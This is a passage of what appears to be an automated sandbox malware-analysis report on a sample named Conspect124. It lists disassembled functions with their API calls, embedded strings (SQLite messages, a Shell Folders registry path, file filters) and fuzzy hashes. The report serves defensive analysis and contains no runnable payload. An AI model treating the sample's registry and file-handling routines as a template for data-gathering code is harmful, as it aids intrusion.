                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _snwprintfwcscpy
                                      • String ID: dialog_%d$general$menu_%d$strings
                                      • API String ID: 999028693-502967061
                                      • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                      • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                      Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                      • API String ID: 2221118986-1606337402
                                      • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                      • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                      Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                        • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                        • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                      • memset.MSVCRT ref: 0040C439
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                      • _wcsupr.MSVCRT ref: 0040C481
                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                      • memset.MSVCRT ref: 0040C4D0
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                      • String ID:
                                      • API String ID: 4131475296-0
                                      • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                      • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                      Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 004116FF
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                      • API String ID: 2618321458-3614832568
                                      • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                      • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                      Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AttributesFilefreememset
                                      • String ID:
                                      • API String ID: 2507021081-0
                                      • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                      • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                      Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                      • malloc.MSVCRT ref: 00417524
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                      • free.MSVCRT ref: 00417544
                                      • free.MSVCRT ref: 00417562
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                      • String ID:
                                      • API String ID: 4131324427-0
                                      • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                      • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                      Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                      • free.MSVCRT ref: 0041822B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: PathTemp$free
                                      • String ID: %s\etilqs_$etilqs_
                                      • API String ID: 924794160-1420421710
                                      • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                      • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                      Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wcscpy.MSVCRT ref: 0041477F
                                      • wcscpy.MSVCRT ref: 0041479A
                                      • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                      • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcscpy$CloseCreateFileHandle
                                      • String ID: General
                                      • API String ID: 999786162-26480598
                                      • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                      • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                      Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                      • _snwprintf.MSVCRT ref: 0040977D
                                      • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ErrorLastMessage_snwprintf
                                      • String ID: Error$Error %d: %s
                                      • API String ID: 313946961-1552265934
                                      • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                      • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                      Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: foreign key constraint failed$new$oid$old
                                      • API String ID: 0-1953309616
                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                      Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                      • API String ID: 3510742995-272990098
                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                      Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0044A6EB
                                      • memset.MSVCRT ref: 0044A6FB
                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: gj
                                      • API String ID: 1297977491-4203073231
                                      • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                      • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                      Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                      • free.MSVCRT ref: 0040E9D3
                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??3@$free
                                      • String ID:
                                      • API String ID: 2241099983-0
                                      • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                      • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                      Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                      • malloc.MSVCRT ref: 004174BD
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                      • free.MSVCRT ref: 004174E4
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                      • String ID:
                                      • API String ID: 4053608372-0
                                      • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                      • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                      Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(?), ref: 0040D453
                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Window$Rect$ClientParentPoints
                                      • String ID:
                                      • API String ID: 4247780290-0
                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                      Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                      • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                      • memset.MSVCRT ref: 004450CD
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                      • String ID:
                                      • API String ID: 1471605966-0
                                      • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                      • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                      Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
                                      • wcscpy.MSVCRT ref: 0044475F
                                      • wcscat.MSVCRT ref: 0044476E
                                      • wcscat.MSVCRT ref: 0044477F
                                      • wcscat.MSVCRT ref: 0044478E
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
